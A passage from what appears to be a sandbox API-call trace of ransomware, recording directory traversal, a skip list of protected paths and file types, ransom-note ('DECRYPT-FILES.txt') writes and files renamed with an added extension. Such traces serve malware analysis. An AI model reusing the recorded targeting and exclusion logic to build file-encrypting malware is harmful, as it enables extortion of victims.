ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.437] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.437] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.437] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0bbe320, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.437] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.437] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0186.437] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0186.437] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0186.437] lstrcatW (in: lpString1="Low", lpString2="\\" | out: lpString1="Low\\") returned="Low\\" [0186.438] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="Low\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Program Files") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch=":\\Windows") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Games\\") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\All Users") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="AhnLab") returned 0x0 [0186.438] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.438] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 64 [0186.438] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.438] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\0a16c9.tmp") returned 75 [0186.438] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.438] GetLastError () returned 0x5 [0186.438] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 64 [0186.438] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.438] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\DECRYPT-FILES.txt") returned 82 [0186.438] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.438] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 64 [0186.438] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*" [0186.438] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0186.439] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.439] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.439] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.439] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.439] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0be4480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.439] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.439] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0be4480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.439] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0186.439] CloseHandle (hObject=0xffffffff) returned 0 [0186.439] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low\\", cAlternateFileName="")) returned 0 [0186.439] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.439] CloseHandle (hObject=0xffffffff) returned 0 [0186.439] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0186.439] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0186.439] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0186.439] lstrcatW (in: lpString1="Recent", lpString2="\\" | out: lpString1="Recent\\") returned="Recent\\" [0186.439] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Recent\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" [0186.439] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Program Files") returned 0x0 [0186.439] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch=":\\Windows") returned 0x0 [0186.439] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Games\\") returned 0x0 [0186.439] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.439] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.439] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.439] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.439] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.439] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\All Users") returned 0x0 [0186.440] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.440] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.440] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.440] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="AhnLab") returned 0x0 [0186.440] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.440] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 58 [0186.440] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.440] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\0a16c9.tmp") returned 69 [0186.440] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.447] GetLastError () returned 0x5 [0186.447] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 58 [0186.448] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.448] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\DECRYPT-FILES.txt") returned 76 [0186.448] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.449] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 58 [0186.449] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*" [0186.449] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0186.450] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.450] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.450] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.450] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.450] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0c0a5e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c0a5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutomaticDestinations", cAlternateFileName="AUTOMA~1")) returned 1 [0186.450] lstrcmpW (lpString1="AutomaticDestinations", lpString2=".") returned 1 [0186.450] lstrcmpW (lpString1="AutomaticDestinations", lpString2="..") returned 1 [0186.450] lstrcatW (in: lpString1="AutomaticDestinations", lpString2="\\" | out: lpString1="AutomaticDestinations\\") returned="AutomaticDestinations\\" [0186.450] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="AutomaticDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Program Files") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch=":\\Windows") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Games\\") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\All Users") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="AhnLab") returned 0x0 [0186.450] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.450] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 80 [0186.450] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.450] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\0a16c9.tmp") returned 91 [0186.450] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.457] GetLastError () returned 0x5 [0186.457] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 80 [0186.457] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.457] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\DECRYPT-FILES.txt") returned 98 [0186.457] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.459] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 80 [0186.459] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" [0186.459] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0c0a5e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c0a5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0186.460] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.460] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0c0a5e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c0a5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.460] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.460] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.460] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0c0a5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1708, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX", cAlternateFileName="1B4DD6~1.R5E")) returned 1 [0186.460] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX", lpString2="DECRYPT-FILES.txt") returned -1 [0186.460] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX", lpString2="autorun.inf") returned -1 [0186.460] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX", lpString2="boot.ini") returned -1 [0186.460] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX", lpString2="desktop.ini") returned -1 [0186.460] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX", lpString2="ntuser.dat") returned -1 [0186.460] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX", lpString2="iconcache.db") returned -1 [0186.460] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX", lpString2="bootsect.bak") returned -1 [0186.460] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX", lpString2="ntuser.dat.log") returned -1 [0186.460] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX", lpString2="thumbs.db") returned -1 [0186.460] lstrcmpiW (lpString1="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX", lpString2="Bootfont.bin") returned -1 [0186.460] lstrlenW (lpString="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX") returned 48 [0186.460] lstrcmpiW (lpString1="r5EqSX", lpString2="lnk") returned 1 [0186.460] lstrcmpiW (lpString1="r5EqSX", lpString2="exe") returned 1 [0186.460] lstrcmpiW (lpString1="r5EqSX", lpString2="sys") returned -1 [0186.460] lstrcmpiW (lpString1="r5EqSX", lpString2="dll") returned 1 [0186.460] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned 80 [0186.460] lstrlenW (lpString="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX") returned 48 [0186.461] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\" [0186.461] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\", lpString2="1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX") 